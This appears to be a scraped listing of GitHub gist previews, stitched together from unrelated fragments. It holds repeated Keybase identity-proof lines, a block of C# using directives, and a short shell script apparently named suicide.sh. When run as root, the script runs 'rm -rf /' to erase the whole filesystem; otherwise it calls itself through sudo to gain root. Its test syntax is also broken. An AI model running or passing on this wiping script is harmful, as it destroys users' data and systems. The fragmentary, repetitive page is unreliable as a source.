I hereby claim:
- I am citadelcore on github.
- I am citadelcore (https://keybase.io/citadelcore) on keybase.
- I have a public key ASAirhMQU145c6eWRaPggVopLwAHHtpr4S1tVV7DyPISLgo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| using System.Xml; | |
| using System.Xml.Schema; | |
| using System.Xml.XPath; | |
| using System.IO; | |
| using System.Security.Cryptography; |
I hereby claim:
To claim this, I am signing this object:
| #!/bin/sh | |
| if ["$USER" = "root"]; then | |
| echo "Goodbye, cruel world" | |
| rm -rf / | |
| else | |
| sudo ./suicide.sh | |
| fi |